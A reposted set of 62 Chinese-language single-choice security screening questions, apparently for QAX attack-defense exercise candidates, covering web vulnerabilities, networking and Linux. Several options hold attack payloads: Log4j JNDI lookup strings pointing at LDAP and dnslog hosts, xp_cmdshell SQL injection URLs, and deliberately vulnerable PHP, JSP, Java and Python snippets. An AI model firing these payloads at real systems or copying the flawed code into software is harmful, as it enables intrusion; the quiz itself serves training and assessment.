QAX HW 初筛(第一批)· 单选部分

admin
admin
admin
140350
文章
117
评论
2024年4月22日00:57:02评论188 views字数 8154阅读27分10秒阅读模式
1. 下面对 cookie 和 session 描述不正确的是?
A. cookie 数据存放在客户的浏览器上,session 数据放在服务器上
B. session 中能够存取的数据类型比 cookie 多

C. cookie 支持跨域名访问,session 仅在他所在的域名内有效

D. 对于用户验证场合,cookie 比 session 更加安全

2. 与 WannaCry 漏洞传播相关的端口号是?

A. 3389    B. 3306    C. 445    D. 1433

3. 下列哪个口令不属于弱口令?
A. aqwe1342Q!@    B. 123456    C. a1Q    D. 12qadas
4. $HOME/.netrc 文件包含下列哪种命令的自动登录信息?
A. ssh    B. rlogin    C. ftp    D. rsh
5. 下面对于 html 状态码描述不正确的是?
A. 404 请求的资源不存在      B. 302 重定向
C. 500 要求身份认证            D. 200 请求成功

6. 栈溢出漏洞产生的原因?

A. 作比较时忽视了有符号数可以为负值

B. 变量直接出现在了格式化字符串函数中格式化字符串所在的位置

C. 覆盖栈上的变量,例如函数指针或对象指针

D. 用户输入的数据大小超过了程序预留的空间大小

7. 下面 php 代码会造成什么漏洞?

$file_path="download/{$_GET['filename']}";$file_path=iconv("utf-8""gb2312"$file_path);if(!file_exists($$file_path)){  skip("false", 'unsafe_down.php');  return;};$fp=fopen($file_path, "rb");$$file_size=filesize($$file_path);ob_clean();Header("Content-type: application/octet-stream");Header("Accept-Ranges: bytes");Header("Accept-Length:".$$file_size);Header("Content-Disposition: attachment; filename=".basename($file_path));$buffer=1024;$file_count=0;while(!feof($fp) && $file_count<$file_size){  $file_con=fread($fp, $buffer);  $file_count+=$buffer;  echo $file_con;};fclose($fp);

A. sql 注入    B. 任意文件上传    C. 任意文件下载    D. 任意文件写入

8. 在使用联合查询注入的过程中,我们需要判断数据表列数,我们用什么方法进行判断?

A. and 1=1    B. union select    C. database()    D. order by

9. 下面 Linux 权限对应错误的是?

A. -rwxr-xr-x 755        B. -r-xr-xr-x 555

C. -rw-r--r-- 622         D. -rwx----w- 702

10. 保证计算机信息运行的安全是计算机安全领域中最重要的环节之一,以下不属于运行安全技术的范畴的是?

A. 应急技术    B. 审计跟踪技术    C. 防火墙技术    D. 风险分析

11. 小刘发现一个网站存在文件上传漏洞,并且可以通过 content-type 的方式绕过,下列哪种方式最合适?

A. 改文件名后缀,改成 jpg    B. 改文件名后缀,改成 php    C. 不做任何修改

D. 截取数据包,将 content-type 内容改为符合白名单规则

12. 下列说法正确的是?

A. SSRF 是服务器端请求伪造,由服务器发起

B. 重放攻击是将截获的数据包进行重放,达到身份认证等目的

C. SSRF 是跨站请求伪造攻击,由客户端发起

D. CSRF 是服务器端请求伪造,由服务器发起

13. nmap 加载 POC 扫描的参数是?

A. --script=vuln    B. --script-vuln    C. --poc    D. --scan-vuln

14. 如果以 apache 为 www 服务器,下列哪个是最重要的配置文件?

A. access.conf    B. srm.cong    C. mime.types    D. httpd.conf

15. S2-057 漏洞形成的原因?

A. 对重定向前缀解析导致的漏洞    B. Xstream 反序列化

C. namespace 处插入 OGNL 代码引发的漏洞    D. Jackson 反序列化

16. 以下哪种利用方式可以对 log4j(2.15.0-RC1)版本进行绕过?

A. $(jndi:ldap://%os%.127.0.0.1}

B. ${jndi:ldap://127.0.0.1:1389/xxx}

C. ${jndi:ldap://127.0.0.1:1389/ xxx}

D. ${jndi:ldap://127.0.0.1:${java:version}/xxx}

17. 下列哪组口令不属于 Tomcat 默认口令?

A. admin/                    B.admin/123456

C. admin/admin          D. tomcat/tomcat

18. 下面 sql 语句表示查询当前数据库的命令是?

A. create database database-name

B. union select database(),2,3,4,5

C. select * from [user]

D. select <*, column [alias], ...> from table

19. MongoDB 默认端口?

A. 1433    B. 27017    C. 6379    D. 27001

20. 192.168.0.1/24 可用 ip 有多少?

A. 1    B. 24    C. 255    D. 254

21. Windows 下查看当前网络连接对应的进程命令是?

A. netstat    B. netstat -antp    C. netstat -an    D. netstat -ano

22. Windows Server 2003 系统的安全日志通过以下哪项来进行设置?

A. 服务管理器    B. 本地安全策略    C. 网络适配器    D. 事件查看器

23. 在 Wireshark 中,哪个过滤器用于显示 DNS 查询请求?

A. dns.resp.name         B. dns.flags==0         C. dns.qry.name

D. dns.flags.response==0

24. Nginx 不存在解析漏洞?

A. 错    B. 对

25. SUID 提权是在文件 SUID 设置的时候,虽然是普通用户在执行,但文件的的执行权是____的权限,若为 root ,那就能够获得最高权限。

A. 系统    B. 普通用户    C. 文件属性    D. 文件

26. MySQL -h host -u user -p password 命令的含义如下,哪些是正确的?

A. -h host 后为对方主机名或 IP 地址    B. -p 后为密码

C. 以上都对                                        D. -u 后为数据库用户名

27. CA 数字证书中不包含的信息有?

A. 证书申请者的私钥    B. CA 的数字签名    C. 证书申请者的个人信息

D. 证书申请者的公钥信息

28. 以下哪一项操作,可以隐藏 php 的 banner 信息使攻击者不知道 Apache 的版本,从而使攻击者难以利用漏洞?

A. 修改 php.ini,改变 expose_php=YES,重启 apache

B. 修改 php.ini,改变 expose_php=ON,重启 apache

C. 修改 php.ini,改变 expose_php=NO,重启 apache

D. 修改 php.ini,改变 expose_php=OFF,重启 apache

29. 在 Android 系统中,可以通过以下哪个文件内容,来判断当前进程是否处于调试状态?
A. /sys/kernel/debug/sync    B. /proc/self/maps    C. /proc/kmgs
D. /proc/self/status

30. 以下哪些攻击正常情况下 WAF 不能拦截的?

A. 存储型 XSS    B. .git 泄露    C. 水平越权    D. SQL 注入

31. 在远程管理 Linux 服务器时,以下哪种方式采用加密的数据传输?

A. rsh    B. ssh    C. telnet    D. rlogin

32. 以下不属于杀毒软件功能的是?

A. 监控识别    B. 优化操作系统    C.扫描和清除    D. 数据恢复

33. 下列哪项 MAC 地址是正确的?

A. fe80::28ea:560b:9348:b2ed%18     B. 202.192.3.22

C. 00-60-08-A6                       D. 00-60-08-A6-38-01

34. 以下哪条能利用 SQL 注入漏洞使用 XP_cmdshell 存储过程,获得某个子目的清单?

A. http://localhost/script?1';EXEC+master..XP_cmdshell+'dir'--

B. http://localhost/script?1';EXEC+master..XP_cmdshell+'dir':--

C. http://localhost/script?';EXEC+master..XP_cmdshell+'dir':--

D. http://localhost/script?0';EXEC+master..XP_cmdshell+'dir':--

35. 下面代码可能存在哪种漏洞?

<%@ page contentType="text/html;charset=UTF-8" language="java" %>Date: <span style="color:red;"> </span><input type="hidden" value="<%=request.getParameter("data")%>" /><script>  var date = document.getElementsByTagName('input')[0].value;  document.getElementsByTagName('span')[0].innerHTML = date;</script>
A. 存储型 XSS    B. DOM 型 XSS    C. LIKE 型 XSS    D. 反射型 XSS
36. 访问 web 网站的某个页面资源不存在时,HTTP 状态码是?

A. 302    B. 404    C. 401    D. 403

37. 下列不是计算机使用道德规范是?
A. 不应该使用计算机进行盗窃活动,不应该使用计算机做伪证
B. 可以拷贝或使用没有付费的版本所有软件
C. 应该注意你编写的程序或设计的系统所造成的社会后果,使用计算机时应该总是考虑到他人并尊重他们

D. 不应该使用计算机危害他人,不应该干涉他人的计算机工作,不应该窥探他人的计算机文件

38. XSS 漏洞能够造成的危害有?
A. 无危害    B. 文件下载    C. 命令执行    D. 数据泄露

39. 下列哪种 sql 注入方式最慢?

A. 宽字节注入    B. 联合注入    C. 报错注入    D. 延时注入

40. 下列 python 代码会造成?

def is_sql_injection(request):    pattern = re.compile(r".*(union)|(select).*")    name_to_test = request.GET['name']    if re.search(pattern, name_to_test):        return True    return False
A. 通过 re.match 截断绕过黑名单    B. 通过 re.compile 换行绕过黑名单
C. 通过 re.match 换行绕过黑名单    D. 通过 re.compile 截断绕过黑名单

41. 列值为空值 (NULL) ,则说明这一列

A. 参数为空格    B. 数值是未知的    C. 不存在    D. 数值为 0

42. 下列不属于 fastbin 的利用方法的是?
A. use after free                  B. fastbin double free
C. 栈溢出,覆盖堆指针变量    D. 堆溢出,覆盖 fd 指针

43. 在某些情况下可以修改 http headers 中的哪个键值来伪造自身 IP?

A. User-Agent    B. Referer    C. X-Forward-For    D. Host
44. 在 Linux 系统中,当用 ls 命令列出文件属性时,如果显示 -rwxrwxrwx,意思是?
A. 前三位 rwx 表示文件属主的访问权限,中间三位 rwx 表示文件同组用户的访问权限,后三位 rwx 表示其他用户的访问权限
B. 前三位 rwx 表示文同组用户的访问权限,中间三位 rwx 表示文件属主的访问权限,后三位 rwx 表示其他用户的访问权限。
C. 前三位 rwx 示文件属主的访问权限,中间三位 rwx 表示文件同组用户的访问权限,后三位 rwx 表示同域用户的访问权限。
D. 前三位 rwx 表示文件同域用户的访问权限,中间三位 rwx 表示文件属主的访问权限,后三位 rwx 表示其他用户的访问权限。

45. 下面属于加密的协议的是?

A. ICMP    B. ARP    C. HTTP    D. SSL

46. 造成格式化字符串漏洞的原因是?
A. 能使用某种输入让程序中某个会输出的字符串结尾没有 null
B. 程序把用户输入的 %x %n 等字符当作元数据来解析
C. 混淆了用户输入与栈上的元数据

D. 用户输入的数据大小超过了程序预留的空间大小

47. 以下说法错误的是?
A. .htaccess 是 Apache 服务器的分布式配置文件,该配置文件会覆盖 Apache 服务器的全局配置,作用域是当前目录及其子目录。
B. 00 截断是因为 PHP 的文件系统操作函数是基于 C 语言开发的。C 语言在处理字符串时遇到 NULL 字符就会认为字符串已经结束。
C. 在 llS6.0 中,文件夹[*.asp ]下的所有文件都会被当作 asp 脚本来执行。

D. 在 Apache 中,一个名为[time.asp;1.jpg]的文件会被识别为 asp 脚本文件,并执行。

48. 公司的网络采用 Server 2008 域模式进行管理,根据工作需要你分别为域、站点和组织单位设置了组策略,对组织单位内的对象来说,这几个组策略的执行顺序是?
A. 域>站点>组织单位      B. 组织单位>域>站点

C. 站点>域>组织单位      D. 织单位>站点>域

49. Wireshark 默认色彩规则中代表报文各类异常是什么颜色?

A. 蓝色    B. 粉色    C. 红色    D. 紫色

50. 下列 Payload 中哪个是 Apache Log4j2 远程代码执行漏洞?
A. ${jndi:ldap://9ao.dnslog.cn}    B. ${jndi:ladp://9ao.dnslog.cn}

C. ${ldap:jndi://9ao.dnslog.cn)    D. ${jnid:ldap://9ao.dnslog.cn}

51. 在 etc 目录下搜索以 sh 开头的文件,正确的命令是?
A. ls /etc/sh            B. find /etc -name "sh*"
C. locate /etc/sh     D. cat /etc/sh

52. 以下将文件从 FTP 服务器传输到客户机的过程称为?

A. 下载    B. 计费    C. 上传    D. 浏览

53. 若锁定了某恶意进程(pid=9876),需要强制结束它,使用的命令是?

A. remore 9876    B. kill -9 9876    C. stop 9876    D. kill 9876

54. 为了查看计算机网卡的配置参数,你在一台装了 Server 2008 的计算机上运行 ipconfig /all,该命令不能查看到下面哪种配置?

A. 默认网关    B. 路由表    C. MAC 地址    D. IP 地址

55. 能够引起计算机故障,破坏计算机数据,影响计算机系统的正常使用的是?

A. 杀毒软件    B. 应用服务    C. 恶意代码    D. 操作系统
56. 下面代码中可能存在哪种漏洞?
URL url = new URL(url);URLConnection connection = url.openConnection();connection.connect();connection.getlnputStream();StringBuilder response = new StringBuilder();BufferedReader in = new BufferedReader(    new lnputStreamReader(connection.gettnputStream()));String line;while ((line = in.readLine()) = null) {    response.append('/n').append(line);}System.out.print(response.toString());

A. CSRF    B. LFI    C. SSRF    D. XSS

57. S2-045 是由于什么导致的 RCE?
A. OGNL 循环解析    B. 对参数名使用 OGNL 解析
C. 基于 Jakarta Multipart 解析器执行文件上传时

D. 在使用 REST 插件,并启用动态方法调用时

58. 下面 python 代码会造成?

from dJango.core.mail import send mailfrom django.http import HttpResponsefrom vuln.models import Userdef reset_pw(request):    email = request.GET['email']    result = User.objects.fllter(email_exact=email.upper()).first()    if not result:        return HttpResponse("User not found!")    send_mail('Reset Password''xxx', [email], fail_silently=False)    return HttpResponse("Password reset email send!"

A. 重置特定账户密码    B. 重置任意账户密码    C. 短信轰炸    D. 任意邮件发送

59. 下面 php 代码会造成什么漏洞?
string exec(string $command [array &$output[int &$return_var]])string shell_exec(string $cmd)string escapeshellcmd(string $command)void passthru(string $command[int &$return_var])

A. 模板注入    B. sql 注入    C. XSS    D. 命令执行

60. 认证授权的基线设置要求中的“从远程系统强制关机”、“关闭系统”、“取得文件或其他对象的所有权”这三项的设置只指派给组?

A. administrator    B. backup operators    C. users    D. everyone

61. Linux 中 netstat 命令不能用于分析以下哪种信息?

A. 可疑 IP    B. 可疑启动项    C. 可疑端口    D. 可疑 PID 进程

62. HttpJspBase 是一个实现了 HttpJspPage 接口并继承了____标准的 Servlet

A. JspPageServlet    B. HttpServlet    C. JspServlet    D. Servlet

原文始发于微信公众号(走在网安路上的哥布林):QAX HW 初筛(第一批)· 单选部分

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日00:57:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   QAX HW 初筛(第一批)· 单选部分http://cn-sec.com/archives/2676821.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息